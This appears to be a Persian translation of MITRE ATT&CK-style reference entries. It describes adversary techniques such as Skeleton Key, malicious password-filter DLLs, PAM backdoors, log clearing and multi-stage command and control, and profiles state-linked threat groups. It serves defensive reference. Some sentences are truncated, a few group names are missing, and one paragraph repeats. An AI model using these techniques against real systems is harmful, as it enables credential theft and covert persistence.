دشمنان ممکن است سعی کنند مصنوعات مرتبط با رفتارهای خود را پنهان کنند تا از شناسایی دوری کنند. سیستم‌های عامل ممکن است دارای ویژگی‌هایی برای پنهان کردن مصنوعات مختلف مانند فایل‌های مهم سیستم و اجرای وظایف مدیریتی باشند تا از ایجاد اختلال در محیط‌های کاری کاربر جلوگیری کنند و از تغییر فایل‌ها یا ویژگی‌های روی سیستم توسط کاربران جلوگیری کنند. دشمنان ممکن است از این ویژگی‌ها برای پنهان کردن مصنوعاتی مانند فایل‌ها، فهرست‌ها، حساب‌های کاربری یا سایر فعالیت‌های سیستم برای فرار از شناسایی سوء استفاده کنند.دشمنان همچنین ممکن است سعی کنند مصنوعات مرتبط با رفتار مخرب را با ایجاد مناطق محاسباتی که از ابزارهای امنیتی رایج جدا شده اند، مانند استفاده از فناوری مجازی سازی، پنهان کنند.

HAFNIUM احتمالاً یک گروه جاسوسی سایبری تحت حمایت دولت است که در خارج از چین فعالیت می‌کند و حداقل از ژانویه 2021 فعال بوده است. پیمانکاران دفاعی، اتاق‌های فکر سیاست، و سازمان‌های غیردولتی.

هیگایسا یک گروه تهدید است که گمان می رود منشاء کره جنوبی داشته باشد. هیگایسا سازمان های دولتی، عمومی و تجاری در کره شمالی را هدف قرار داده است. با این حال، آنها همچنین حملاتی را در چین، ژاپن، روسیه، لهستان و سایر کشورها انجام داده اند. Higaisa اولین بار در اوایل سال 2019 فاش شد، اما ارزیابی می شود که در اوایل سال 2009 فعالیت کرده است.

Honeybee کمپینی است که توسط یک بازیگر ناشناس رهبری می شود که سازمان های کمک های بشردوستانه را هدف قرار می دهد و در ویتنام، سنگاپور، آرژانتین، ژاپن، اندونزی و کانادا فعال بوده است. از آگوست 2017 و اخیراً در فوریه 2018 فعالیت فعال داشته است.

دسترسی اولیه شامل تکنیک‌هایی است که از بردارهای ورودی مختلف برای به دست آوردن جایگاه اولیه خود در یک شبکه استفاده می‌کنند. تکنیک‌های مورد استفاده برای به دست آوردن جایگاهی شامل spearphishing هدفمند و بهره برداری از نقاط ضعف در وب سرورهای عمومی است.

دشمنان ممکن است از مکانیسم های ارتباط بین فرآیندی (IPC) برای اجرای کد محلی یا دستورات سوء استفاده کنند. IPCمعمولاً توسط فرآیندها برای به اشتراک گذاری داده‌ها، برقراری ارتباط با یکدیگر یا همگام سازی اجرا استفاده می شود. IPC همچنین معمولاً برای جلوگیری از موقعیت‌هایی مانند بن‌بست استفاده می‌شود، که زمانی رخ می‌دهد که فرآیندها در یک الگوی انتظار چرخه‌ای گیر کرده باشند. ممکن است دشمنان از IPC برای اجرای کد یا دستورات دلخواه سوء استفاده کنند. مکانیسم های IPC ممکن است بسته به سیستم عامل متفاوت باشد، اما معمولاً به شکلی وجود دارد که از طریق زبان های برنامه نویسی/کتابخانه ها یا رابط های بومی مانند Windows Dynamic Data Exchange یا Component Object Model قابل دسترسی است. رسانه‌های اجرایی سطح بالاتر، مانند مترجم‌های Command و Scripting نیز ممکن است از مکانیسم‌های IPC استفاده کنند. دشمنان همچنین ممکن است از خدمات راه دور مانند مدل شیء جزء توزیع شده برای تسهیل اجرای IPCاز راه دور استفاده کنند.

دشمنان ممکن است تصاویر ابری یا کانتینری را با کد مخرب کاشت کنند تا پس از دسترسی به یک محیط، پایداری را ثابت کنند. خدمات وب آمازون ( AWS) ، تصاویر ماشین آمازون ( AWS)، تصاویر پلتفرم ابری گوگل ( GCP) و تصاویر آژور و همچنین زمان‌های اجرای کانتینر محبوب مانند Docker را می‌توان کاشت یا در پشتی قرار داد. برخلاف آپلود بدافزار، این تکنیک بر روی دشمنان تمرکز دارد که یک تصویر را در یک رجیستری در محیط قربانی قرار می دهند. بسته به نحوه تهیه زیرساخت، اگر به ابزار تأمین زیرساخت دستور داده شود همیشه از آخرین تصویر استفاده کند، این می‌تواند دسترسی دائمی را فراهم کند. ابزاری برای تسهیل کاشت درهای پشتی در تصاویر ظروف ابری ایجاد شده است. اگر یک مهاجم به یک نمونه AWS در معرض خطر دسترسی داشته باشد، و مجوز فهرست کردن تصاویر کانتینر موجود را داشته باشد، ممکن است یک درب پشتی مانند Web Shell را کاشت کند.

حاکمیت اطلاعات، فناوری‌ها، خط‌مشی‌ها، فرآیندها، کنترل‌ها و استراتژی‌های سازمان است که برای بهینه‌سازی اطلاعات به‌منظور برآورده کردن نیازهای تجاری آن و همچنین مقررات قانونی و صنعتی و در عین حال به حداقل رساندن خطرات به کار می‌رود.

جنگ اطلاعاتی هر اقدامی برای رد کردن، بهره برداری، فاسد یا از بین بردن اطلاعات دشمن و کارکردهای آن، محافظت از خود در برابر این اقدامات و بهره برداری از عملکرد اطلاعات نظامی خودمان است.

امنیت اطلاعات به فرآیندها و روش‌هایی اطلاق می‌شود که برای محافظت از اطلاعات یا داده‌های چاپی، الکترونیکی یا هر شکل دیگری از اطلاعات یا داده‌های محرمانه، خصوصی و حساس از دسترسی، استفاده، سوء استفاده، افشا، تخریب، اصلاح یا اختلال غیرمجاز طراحی و اجرا می‌شوند.

دشمنان ممکن است به طور مخرب اجزای یک محیط قربانی را به منظور ممانعت یا غیرفعال کردن مکانیسم های دفاعی تغییر دهند. این نه تنها شامل آسیب رساندن به دفاع های پیشگیرانه مانند فایروال ها و آنتی ویروس ها می شود، بلکه قابلیت های تشخیصی را نیز شامل می شود که مدافعان می توانند از آنها برای بررسی فعالیت ها و شناسایی رفتارهای مخرب استفاده کنند. این همچنین ممکن است هم دفاع بومی و هم قابلیت های تکمیلی نصب شده توسط کاربران و مدیران را دربرگیرد. دشمنان همچنین می توانند مکانیسم های تجمع و تجزیه و تحلیل رویدادها را هدف قرار دهند یا در غیر این صورت با تغییر سایر اجزای سیستم، این رویه ها را مختل کنند.

دشمنان ممکن است مصنوعات تولید شده در سیستم میزبان را حذف یا تغییر دهند، از جمله گزارش‌ها یا فایل‌های ضبط شده مانند بدافزار قرنطینه شده. مکان‌ها و قالب گزارش‌ها مربوط به پلتفرم یا محصول خاص است، با این حال گزارش‌های استاندارد سیستم عامل به‌عنوان رویدادهای Windows یا فایل‌های Linux/macOS مانند Bash History و /var/log/* ثبت می‌شوند. این اقدامات ممکن است با جمع‌آوری رویداد، گزارش‌دهی یا سایر اعلان‌های مورد استفاده برای شناسایی فعالیت‌های نفوذ تداخل داشته باشد. این ممکن است یکپارچگی راه حل های امنیتی را با گزارش نشدن رویدادهای مهم به خطر بیاندازد. این فعالیت همچنین ممکن است به دلیل عدم وجود داده های کافی برای تعیین آنچه رخ داده است، تجزیه و تحلیل پزشکی قانونی و واکنش حادثه را مختل کند.

دشمنان ممکن است از ابزارهایی سوء استفاده کنند که امکان اجرای دستور را فراهم می کنند تا محدودیت های امنیتی را که استفاده از مفسرهای خط فرمان را محدود می کند، دور بزنند. ممکن است از ابزارهای مختلف ویندوز برای اجرای دستورات، احتمالاً بدون فراخوانی cmd استفاده شود. به عنوان مثال، Forfiles، دستیار سازگاری برنامه ( pcalua.exe) ، اجزای زیرسیستم ویندوز برای لینوکس ( WSL)، و همچنین سایر ابزارهای کمکی ممکن است اجرای برنامه ها و دستورات را از یک مترجم Command و Scripting، پنجره Run یا اجرا کنند. از طریق اسکریپت ها دشمنان ممکن است از این ویژگی‌ها برای فرار از دفاع سوء استفاده کنند، به‌ویژه برای اجرای خودسرانه در حین براندازی تشخیص‌ها و/یا کنترل‌های کاهش‌دهنده (مانند خط‌مشی گروه) که استفاده از cmd یا پسوندهای فایل را که معمولاً با بارهای مخرب مرتبط هستند، محدود یا جلوگیری می‌کنند.

دشمنان ممکن است از روش هایی برای گرفتن اطلاعات ورودی کاربر برای به دست آوردن اعتبار یا جمع آوری اطلاعات استفاده کنند. در طول استفاده عادی از سیستم، کاربران اغلب اعتبارنامه‌ها را به مکان‌های مختلف، مانند صفحات ورود/پورتال یا جعبه‌های محاوره‌ای سیستم ارائه می‌کنند. مکانیسم‌های دریافت ورودی ممکن است برای کاربر شفاف باشد مانند (Credential API Hooking) یا به فریب کاربر برای ارائه ورودی به خدماتی که معتقدند یک سرویس واقعی است (مثلاً ضبط پورتال وب) متکی باشد.

دشمنان ممکن است از spearphishing داخلی برای دسترسی به اطلاعات اضافی یا سوء استفاده از سایر کاربران در همان سازمان پس از اینکه قبلاً به حساب ها یا سیستم های موجود در محیط دسترسی داشتند، استفاده کنند. spearphishing داخلی یک حمله چند مرحله‌ای است که در آن یک حساب ایمیل یا با کنترل دستگاه کاربر با بدافزار نصب‌شده قبلی و یا با به خطر انداختن اعتبار حساب کاربر، متعلق به آن است. دشمنان سعی می کنند از یک حساب داخلی قابل اعتماد استفاده کنند تا احتمال فریب دادن هدف را افزایش دهند. دشمنان ممکن است از ضمیمه Spearphishing یا Spearphishing Link به عنوان بخشی از spearphishing داخلی برای تحویل بار یا هدایت مجدد به یک سایت خارجی برای گرفتن اعتبار از طریق Input Capture در سایت‌هایی که رابط‌های ورود ایمیل را تقلید می‌کنند، استفاده کنند. حوادث قابل توجهی وجود داشته است که در آن از spearphishing داخلی استفاده شده است. کمپین Eye Pyramid از ایمیل‌های فیشینگ با پیوست‌های مخرب برای جابجایی جانبی بین قربانیان استفاده کرد که در این فرآیند نزدیک به 18000 حساب ایمیل را به خطر انداخت. ارتش الکترونیک سوریه ( SEA) حساب های ایمیل در فایننشال تایمز ( FT) را به خطر انداخت تا اعتبار حساب های اضافی را به سرقت ببرد. هنگامی که FT از حمله مطلع شد و شروع به هشدار به کارکنان در مورد تهدید کرد، SEA ایمیل های فیشینگ را به تقلید از بخش فناوری اطلاعات فایننشال تایمز ارسال کرد و توانست حتی کاربران بیشتری را به خطر بیندازد.

دشمنان ممکن است ابزارها یا فایل های دیگر را از یک سیستم خارجی به یک محیط در معرض خطر انتقال دهند. فایل ها ممکن است از یک سیستم کنترل شده توسط دشمن خارجی از طریق کانال فرمان و کنترل برای آوردن ابزارها به شبکه قربانی یا از طریق پروتکل های جایگزین با ابزار دیگری مانند FTP کپی شوند. همچنین می توان فایل ها را در مک و لینوکس با ابزارهای بومی مانند scp، rsync و sftp کپی کرد.

دشمنان ممکن است داده‌های سیستم عامل داخلی را حذف یا حذف کنند و خدماتی را که برای کمک به بازیابی یک سیستم خراب طراحی شده‌اند خاموش کنند تا از بازیابی جلوگیری کنند. سیستم‌های عامل ممکن است دارای ویژگی‌هایی باشند که می‌توانند به رفع سیستم‌های خراب کمک کنند، مانند کاتالوگ پشتیبان، کپی‌های سایه حجمی، و ویژگی‌های تعمیر خودکار. دشمنان ممکن است ویژگی های بازیابی سیستم را غیرفعال یا حذف کنند تا اثرات تخریب داده ها و داده های رمزگذاری شده برای تأثیر را افزایش دهند.

Inception یک گروه جاسوسی سایبری است که حداقل از سال 2014 فعال است. این گروه صنایع و نهادهای دولتی متعددی را عمدتاً در روسیه هدف قرار داده است، اما در ایالات متحده و در سراسر اروپا، آسیا، آفریقا و خاورمیانه نیز فعال بوده است.

IndigoZebra یک گروه مظنون به جاسوسی سایبری چینی است که حداقل از سال 2014 دولت های آسیای مرکزی را هدف قرار داده است.

Indrik Spider یک گروه مجرم سایبری مستقر در روسیه است که حداقل از سال 2014 فعال بوده است. Indrik Spider در ابتدا با تروجان بانکی Dridex شروع به کار کرد و سپس در سال 2017 آنها شروع به اجرای عملیات باج افزار با استفاده از BitPaymer، WastedLocker، و باج افزار Hades کردند.

برای حذف محدودیت های یک سیستم عامل، به ویژه iOS، از دستگاهی که آن سیستم عامل را اجرا می کند. جیلبریک نوعی افزایش امتیاز است. از آنجایی که کاربران معمولاً دستگاه‌های خود را جیلبریک می‌کنند، مجاز بودن جیلبریک به قراردادهای مجوز کاربر نهایی و قوانین قابل اجرا بستگی دارد.

هک درجه پایین برخی از اقلام غیرمحتمل که امکان به دست آوردن اطلاعات را به روشی بدیع و غیرمنتظره نشان می دهد، اما بهره برداری در دنیای واقعی آن است. احتمالاً بسیار دشوار است بنابراین یک تهدید از لحاظ نظری ممکن اما از نظر واقع بینانه بسیار غیرقابل قبول است.

Ke3chang یک گروه تهدید منسوب به بازیگرانی است که خارج از چین فعالیت می کنند. Ke3chang چندین صنعت از جمله نفت، دولتی، نظامی و غیره را هدف قرار داده است.

کیمسوکی یک گروه جاسوسی سایبری مستقر در کره شمالی است که حداقل از سال 2012 فعال بوده است. این گروه ابتدا بر روی هدف قرار دادن نهادهای دولتی کره جنوبی، اتاق های فکر و افرادی که به عنوان متخصص در زمینه های مختلف شناسایی می شدند، تمرکز کرد و عملیات خود را گسترش داد تا شامل ایالات متحده شود. کشورها، روسیه، اروپا و سازمان ملل متحد. کیمسوکی فعالیت های جمع آوری اطلاعات خود را بر سیاست خارجی و مسائل امنیت ملی مرتبط با شبه جزیره کره، سیاست هسته ای و تحریم ها متمرکز کرده است. کیمسوکی مسئول سازش شرکت انرژی هیدرو و هسته‌ای کره در سال 2014 ارزیابی شد. کمپین های قابل توجه دیگر عبارتند از: STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen تعاریف گروه کره شمالی دارای همپوشانی قابل توجهی هستند و برخی از محققان امنیتی همه فعالیت های سایبری تحت حمایت دولت کره شمالی را تحت نام گروه لازاروس به جای ردیابی خوشه ها یا زیر گروه ها گزارش می دهند.

هر وسیله‌ای که توسط آن ضربه‌های کلید قربانیان به هنگام تایپ در آن ثبت می‌شوند. صفحه کلید فیزیکی کی لاگر می تواند یک راه حل نرم افزاری یا یک دستگاه سخت افزاری باشد که برای گرفتن هر چیزی استفاده می شود که کاربر ممکن است از جمله رمز عبور، پاسخ به سوالات محرمانه یا جزئیات و اطلاعات را تایپ کند ایمیل، چت و اسناد تشکیل دهید.

دشمنان ممکن است ابزارها یا فایل های دیگر را بین سیستم ها در یک محیط در معرض خطر انتقال دهند. فایل‌ها ممکن است از یک سیستم به سیستم دیگر کپی شوند تا ابزارهای دشمن یا فایل‌های دیگر در طول یک عملیات به مرحله اجرا درآیند. دشمنان ممکن است فایل‌ها را به صورت جانبی بین سیستم‌های قربانی داخلی برای پشتیبانی از حرکت جانبی با استفاده از پروتکل‌های اشتراک‌گذاری فایل ذاتی مانند اشتراک‌گذاری فایل از طریق SMB به اشتراک‌گذاری‌های شبکه متصل یا با اتصالات احراز هویت شده با SMB/Windows Admin Shares یا Protocol Remote Desktop کپی کنند. همچنین می توان فایل ها را در مک و لینوکس با ابزارهای بومی مانند scp، rsync و sftp کپی کرد.

گروه لازاروس یک گروه تهدید سایبری تحت حمایت دولت کره شمالی است که به اداره کل شناسایی نسبت داده شده است. این گروه حداقل از سال 2009 فعال بوده است و گزارش شده است که مسئول حمله مخرب برف پاک کن در نوامبر 2014 علیه Sony Pictures Entertainment به عنوان بخشی از کمپینی به نام Operation Blockbuster by Novetta بوده است. بدافزار استفاده شده توسط Lazarus Group با سایر کمپین های گزارش شده از جمله Operation Flame، Operation 1 Mission، Operation Troy، DarkSeoul و Ten Days of Rain مرتبط است. تعاریف گروه کره شمالی دارای همپوشانی قابل توجهی هستند و برخی از محققان امنیتی همه فعالیت های سایبری تحت حمایت دولت کره شمالی را تحت نام گروه لازاروس به جای ردیابی خوشه‌ها یا زیر گروه ها مانند , , , and . گزارش می دهند.

Leafminer یک گروه تهدید ایرانی است که حداقل از اوایل سال 2017 سازمان‌های دولتی و نهادهای تجاری در خاورمیانه را هدف قرار داده است.

لویاتان یک گروه جاسوسی سایبری تحت حمایت دولت چین است که به اداره امنیت ایالتی هاینان وزارت امنیت دولتی ( MSS) و یک شرکت فرانت وابسته به آن نسبت داده شده است. لویاتان که حداقل از سال 2009 فعال است، بخش های زیر را هدف قرار داده است: دانشگاه، هوافضا/هواپیمایی، زیست پزشکی، پایگاه صنعتی دفاعی، دولت، مراقبت های بهداشتی، تولید، دریایی، و حمل و نقل در سراسر ایالات متحده، کانادا، اروپا، خاورمیانه و آسیای جنوب شرقی.

شکوفه لوتوس یک گروه تهدید است که سازمان های دولتی و نظامی در جنوب شرقی آسیا را هدف قرار داده است.

حرکت جانبی به تکنیک هایی اطلاق می شود که یک مهاجم سایبری پس از دستیابی به دسترسی اولیه، برای حرکت به عمق شبکه در جستجوی داده های حساس و سایر دارایی های با ارزش استفاده می کند.

خرابی حافظه در یک برنامه کامپیوتری زمانی رخ می‌دهد که محتویات یک مکان حافظه به دلیل رفتار برنامه‌ای که از قصد برنامه نویس اصلی یا سازه‌های برنامه-زبان فراتر می‌رود، تغییر می‌کند. این را نقض ایمنی حافظه می‌نامند. محتمل‌ترین علت خرابی حافظه خطای برنامه نویسی است. وقتی از محتویات حافظه خراب بعداً در آن برنامه استفاده می‌شود، یا به خرابی برنامه می‌انجامد یا به رفتار برنامه عجیب و غریب می‌انجامد. نزدیک به 10 درصد از خرابی برنامه‌ها در سیستم‌های ویندوز به دلیل خرابی پشته است.

دشمنان ممکن است مکانیسم‌ها و فرآیندهای احراز هویت را برای دسترسی به اعتبار کاربر تغییر دهند یا دسترسی غیرمجاز به حساب‌ها را فعال کنند. فرآیند احراز هویت توسط مکانیسم‌هایی مانند فرآیند تأیید اعتبار محلی امنیتی (LSASS) و مدیر حساب‌های امنیتی (SAM) در ویندوز، ماژول‌های احراز هویت قابل اتصال ( PAM) در سیستم‌های مبتنی بر یونیکس و پلاگین‌های مجوز در سیستم‌های MacOS انجام می‌شود. برای جمع آوری، ذخیره و تأیید اعتبار. با تغییر فرآیند احراز هویت، یک دشمن ممکن است بتواند بدون استفاده از حساب‌های معتبر به یک سرویس یا سیستم احراز هویت کند. دشمنان ممکن است به طور مخرب بخشی از این فرآیند را تغییر دهند تا اعتبارنامه ها را فاش کنند یا مکانیزم های احراز هویت را دور بزنند. اعتبار یا دسترسی به خطر افتاده ممکن است برای دور زدن کنترل‌های دسترسی قرار گرفته بر روی منابع مختلف در سیستم‌های درون شبکه استفاده شود و حتی ممکن است برای دسترسی دائمی به سیستم‌های راه دور و سرویس‌های موجود خارجی، مانند VPN، Outlook Web Access و دسک‌تاپ راه دور استفاده شود.

دشمنان ممکن است فرآیند احراز هویت را روی یک کنترل‌کننده دامنه وصله کنند تا مکانیسم‌های احراز هویت معمولی را دور بزنند و دسترسی به حساب‌ها را فعال کنند. بدافزار ممکن است برای تزریق اعتبار نادرست به فرآیند احراز هویت در یک کنترل‌کننده دامنه با هدف ایجاد یک درب پشتی مورد استفاده برای دسترسی به حساب و/یا اعتبار هر کاربر (مثلاً Skeleton Key) استفاده شود. Skeleton key از طریق وصله‌ای روی فرآیند تأیید هویت کنترل‌کننده دامنه سازمانی (LSASS ) با اعتبارنامه‌هایی کار می‌کند که دشمنان ممکن است از آن برای دور زدن سیستم احراز هویت استاندارد استفاده کنند. پس از اصلاح، دشمن می تواند از رمز عبور تزریق شده برای احراز هویت به عنوان حساب کاربری دامنه استفاده کند (تا زمانی که کلید اسکلت با راه اندازی مجدد کنترل کننده دامنه از حافظه پاک شود). دسترسی تایید شده ممکن است دسترسی بدون محدودیت به میزبان ها و یا منابع در محیط های احراز هویت تک عاملی را فعال کند.

دشمنان ممکن است کتابخانه‌های پیوند پویا فیلتر رمز عبور مخرب ( DLL) را در فرآیند احراز هویت ثبت کنند تا اعتبار کاربر را پس از تأیید اعتبار به دست آورند. فیلترهای رمز عبور ویندوز مکانیزم های اجرای سیاست رمز عبور برای حساب های دامنه و محلی هستند. فیلترها به‌عنوان DLL پیاده‌سازی می‌شوند که حاوی روشی برای تأیید گذرواژه‌های احتمالی در برابر سیاست‌های رمز عبور هستند. DLL های فیلتر را می توان در رایانه های محلی برای حساب های محلی و/یا کنترل کننده های دامنه برای حساب های دامنه قرار داد. قبل از ثبت گذرواژه‌های جدید در مدیریت حساب‌های امنیتی ( SAM)، سازمان امنیت محلی ( LSA) از هر فیلتر ثبت‌شده درخواست تأیید اعتبار می‌کند. تا زمانی که هر فیلتر ثبت‌شده تأیید اعتبار نکند، هیچ تغییر احتمالی نمی‌تواند اعمال شود. دشمنان می توانند فیلترهای رمز عبور مخرب را برای جمع آوری اعتبار از رایانه های محلی و/یا کل دامنه ها ثبت کنند. برای انجام اعتبارسنجی مناسب، فیلترها باید اعتبارنامه متن ساده را از LSA دریافت کنند. یک فیلتر رمز عبور مخرب هر بار که درخواست رمز عبور انجام می‌شود، این اعتبارنامه‌های متن ساده را دریافت می‌کند.

دشمنان ممکن است ماژول‌های احراز هویت قابل اتصال (PAM)را برای دسترسی به اعتبار کاربر تغییر دهند یا دسترسی غیرمجاز به حساب‌ها را فعال کنند. PAM یک سیستم مدولار از فایل‌های پیکربندی، کتابخانه‌ها و فایل‌های اجرایی است که احراز هویت را برای بسیاری از خدمات راهنمایی می‌کند. رایج‌ترین ماژول احراز هویت pam_unix.so است که اطلاعات احراز هویت حساب را در /etc/shadow و /etc/passwd بازیابی، تنظیم و تأیید می‌کند. دشمنان ممکن است اجزای سیستم PAM را برای ایجاد درهای پشتی تغییر دهند. مؤلفه‌های PAM، مانند pam_unix.so، می‌توانند وصله شوند تا مقادیر عرضه‌شده توسط دشمن دلخواه را به‌عنوان اعتبارنامه‌های قانونی بپذیرند.همچنین ممکن است از تغییرات مخرب سیستم PAM برای سرقت اطلاعات استفاده شود. دشمنان ممکن است منابع PAM را با کد آلوده کنند تا اطلاعات کاربری کاربر را جمع آوری کنند، زیرا مقادیر مبادله شده با اجزای PAM ممکن است متن ساده باشند زیرا PAM رمزهای عبور را ذخیره نمی کند.

دشمنان ممکن است از Patch System Image برای کدگذاری سخت رمز عبور در سیستم عامل استفاده کنند، بنابراین مکانیسم‌های احراز هویت بومی برای حساب‌های محلی در دستگاه‌های شبکه را دور می‌زنند. Modify System Image ممکن است شامل کدهای کاشته شده در سیستم عامل برای دستگاه های شبکه باشد تا با استفاده از یک رمز عبور خاص، دسترسی دشمنان را فراهم کند. این اصلاح شامل یک رمز عبور خاص است که از طریق پچ در تصویر سیستم عامل کاشته می شود. پس از تلاش برای احراز هویت، کد درج شده ابتدا بررسی می کند که آیا ورودی کاربر رمز عبور است یا خیر. اگر چنین است، دسترسی داده می شود. در غیر این صورت، کد کاشته شده اعتبارنامه را برای تأیید اعتبار بالقوه معتبر منتقل می کند.

ماتریس ها تکنیک های مربوط به دسترسی دستگاه و اثرات مبتنی بر شبکه را پوشش می دهند که می توانند توسط دشمنان بدون دسترسی به دستگاه مورد استفاده قرار گیرند. این ماتریکس حاوی اطلاعاتی برای پلتفرم‌های زیر است: Android، iOS.

دشمنان ممکن است سعی کنند ویژگی‌های مصنوعات خود را دستکاری کنند تا آنها را برای کاربران و/یا ابزارهای امنیتی مشروع یا بی‌خطر جلوه دهند. پنهان کردن زمانی اتفاق می‌افتد که نام یا مکان یک شیء، مشروع یا مخرب، به منظور فرار از دفاع و مشاهده، دستکاری یا سوء استفاده شود. این ممکن است شامل دستکاری ابرداده فایل، فریب دادن کاربران به شناسایی نادرست نوع فایل، و دادن نام قانونی وظایف یا خدمات باشد. تغییر نام ابزارهای قابل سوء استفاده سیستم برای فرار از نظارت امنیتی نیز نوعی از ماسکه کردن است.

دشمنان ممکن است مکانیسم‌ها و فرآیندهای احراز هویت را برای دسترسی به اعتبار کاربر تغییر دهند یا دسترسی غیرمجاز به حساب‌ها را فعال کنند. فرآیند احراز هویت توسط مکانیسم‌هایی مانند فرآیند تأیید اعتبار محلی امنیتی ( LSASS) و مدیر حساب‌های امنیتی (SAM) در ویندوز، ماژول‌های احراز هویت قابل اتصال در سیستم‌های مبتنی بر یونیکس و پلاگین‌های مجوز در سیستم‌های MacOS انجام می‌شود. برای جمع آوری، ذخیره و تأیید اعتبار. با تغییر فرآیند احراز هویت، یک دشمن ممکن است بتواند بدون استفاده از حساب‌های معتبر به یک سرویس یا سیستم احراز هویت کند. دشمنان ممکن است به طور مخرب بخشی از این فرآیند را تغییر دهند تا اعتبارنامه ها را فاش کنند یا مکانیزم های احراز هویت را دور بزنند. اعتبار یا دسترسی به خطر افتاده ممکن است برای دور زدن کنترل‌های دسترسی قرار گرفته بر روی منابع مختلف در سیستم‌های درون شبکه استفاده شود و حتی ممکن است برای دسترسی دائمی به سیستم‌های راه دور و سرویس‌های موجود خارجی، مانند VPN، Outlook Web Access و دسک‌تاپ راه دور استفاده شود.

یک دشمن ممکن است تلاش کند زیرساخت خدمات محاسباتی یک حساب ابری را برای فرار از دفاع تغییر دهد. یک تغییر در زیرساخت خدمات محاسباتی می تواند شامل ایجاد، حذف یا اصلاح یک یا چند مؤلفه مانند نمونه‌های محاسباتی، ماشین های مجازی و عکس های فوری باشد. مجوزهای به دست آمده از اصلاح اجزای زیرساخت ممکن است محدودیت هایی را که مانع از دسترسی به زیرساخت های موجود می شود دور بزنند. اصلاح اجزای زیرساخت همچنین ممکن است به دشمن اجازه دهد تا از شناسایی فرار کند و شواهد حضور آنها را حذف کند.

دشمنان ممکن است با رجیستری ویندوز تعامل داشته باشند تا اطلاعات پیکربندی را در کلیدهای رجیستری پنهان کنند، اطلاعات را به عنوان بخشی از پاکسازی حذف کنند، یا به عنوان بخشی از تکنیک های دیگر برای کمک به تداوم و اجرا. دسترسی به مناطق خاصی از رجیستری به مجوزهای حساب بستگی دارد، برخی از آنها نیاز به دسترسی در سطح سرپرست دارند. ابزار خط فرمان داخلی Reg ممکن است برای اصلاح رجیستری محلی یا راه دور استفاده شود. ابزارهای دیگری نیز ممکن است مورد استفاده قرار گیرند، مانند ابزار دسترسی از راه دور، که ممکن است دارای عملکردی برای تعامل با رجیستری از طریق Windows API باشد. تغییرات رجیستری همچنین ممکن است شامل اقداماتی برای پنهان کردن کلیدها باشد، مانند اضافه کردن نام کلید با کاراکتر تهی، که هنگام خواندن از طریق Reg یا سایر ابزارهای کاربردی با استفاده از Win32 API باعث خطا می شود و/یا نادیده گرفته می شود. دشمنان ممکن است از این کلیدهای شبه پنهان برای پنهان کردن محموله ها/دستورهای استفاده شده برای حفظ پایداری سوء استفاده کنند. رجیستری یک سیستم راه دور ممکن است برای کمک به اجرای فایل ها به عنوان بخشی از حرکت جانبی اصلاح شود. این نیاز به سرویس رجیستری راه دور در سیستم مورد نظر دارد. اغلب حساب‌های معتبر همراه با دسترسی به اشتراک‌های مدیریت SMB/Windows سیستم راه دور برای ارتباطات RPC مورد نیاز است.

دشمنان ممکن است تغییراتی در سیستم عامل دستگاه های شبکه تعبیه شده برای تضعیف دفاع و ارائه قابلیت‌های جدید برای خود ایجاد کنند. در چنین دستگاه‌هایی، سیستم‌عامل‌ها معمولاً یکپارچه هستند و بیشتر عملکرد و قابلیت‌های دستگاه در یک فایل واحد قرار دارند. برای تغییر سیستم عامل، حریف معمولاً فقط باید روی این یک فایل تأثیر بگذارد، آن را جایگزین یا اصلاح کند. این کار را می توان به صورت زنده در حافظه در طول زمان اجرای سیستم برای تأثیر فوری انجام داد، یا در ذخیره سازی برای اجرای تغییر در بوت بعدی دستگاه شبکه.

دشمنان ممکن است مراحل متعددی را برای فرماندهی و کنترل ایجاد کنند که تحت شرایط مختلف یا برای عملکردهای خاص به کار گرفته می شوند. استفاده از چند مرحله ممکن است کانال فرمان و کنترل را مبهم کند تا تشخیص را دشوارتر کند. ابزارهای دسترسی از راه دور برای دستورالعمل ها به سرور فرمان و کنترل مرحله اول تماس خواهند گرفت. مرحله اول ممکن است دارای قابلیت های خودکار برای جمع آوری اطلاعات اولیه میزبان، به روز رسانی ابزارها و آپلود فایل های اضافی باشد. دومین ابزار دسترسی از راه دور ( RAT) می تواند در آن نقطه آپلود شود تا میزبان را به سرور فرمان و کنترل مرحله دوم هدایت کند. مرحله دوم احتمالاً کاملتر خواهد بود و به دشمن اجازه می دهد تا از طریق پوسته معکوس و ویژگی های RAT اضافی با سیستم تعامل داشته باشد. مراحل مختلف احتمالاً به طور جداگانه بدون زیرساخت های همپوشانی میزبانی می شوند. لودر همچنین ممکن است دارای تماس های پشتیبان مرحله اول یا کانال های بازگشتی در صورت کشف و مسدود شدن مسیر ارتباطی مرحله اول اولیه باشد.

Machete یک گروه جاسوسی سایبری مشکوک به زبان اسپانیایی است که حداقل از سال 2010 فعال بوده است. این گروه عمدتاً فعالیت های خود را در آمریکای لاتین، با تأکید ویژه بر ونزوئلا، و همچنین در ایالات متحده، اروپا، روسیه و بخش هایی از آسیا متمرکز کرده است. Machete به طور کلی سازمان های برجسته مانند موسسات دولتی، سرویس های اطلاعاتی، و واحدهای نظامی، و همچنین شرکت های مخابراتی و برق را هدف قرار می دهد.

Magic Hound یک گروه تهدید تحت حمایت ایران است که عملیات جاسوسی سایبری طولانی مدت و با منابع فشرده را انجام می دهد که احتمالاً از طرف سپاه پاسداران انقلاب اسلامی است. آنها حداقل از سال 2014 از طریق کمپین های مهندسی اجتماعی پیچیده، پرسنل نظامی و دولت ایالات متحده و خاورمیانه، دانشگاهیان، روزنامه نگاران و سازمان هایی مانند سازمان بهداشت جهانی (WHO) را هدف قرار داده اند.

menuPass یک گروه تهدید است که حداقل از سال 2006 فعال بوده است. شناخته شده است که اعضای منفرد menuPass در ارتباط با اداره امنیت دولتی تیانجین وزارت امنیت دولتی چین (MSS)و برای شرکت توسعه علم و فناوری Huaying Haitai کار می کردند. menuPass مراقبت های بهداشتی، دفاعی، هوافضا، مالی، دریایی، بیوتکنولوژی، انرژی و بخش های دولتی را در سطح جهان با تاکید بر سازمان های ژاپنی هدف قرار داده است. در سال‌های 2016 و 2017، این گروه ارائه‌دهندگان خدمات فناوری اطلاعات ( MSPs) ، شرکت‌های تولیدی و معدنی، و یک دانشگاه را هدف قرار داده است.

Moafee یک گروه تهدید است که به نظر می رسد از استان گواندونگ چین فعالیت می کند. به دلیل همپوشانی TTPها، از جمله ابزارهای سفارشی مشابه، تصور می شود که Moafee رابطه مستقیم یا غیرمستقیم با گروه تهدید DragonOK دارد.

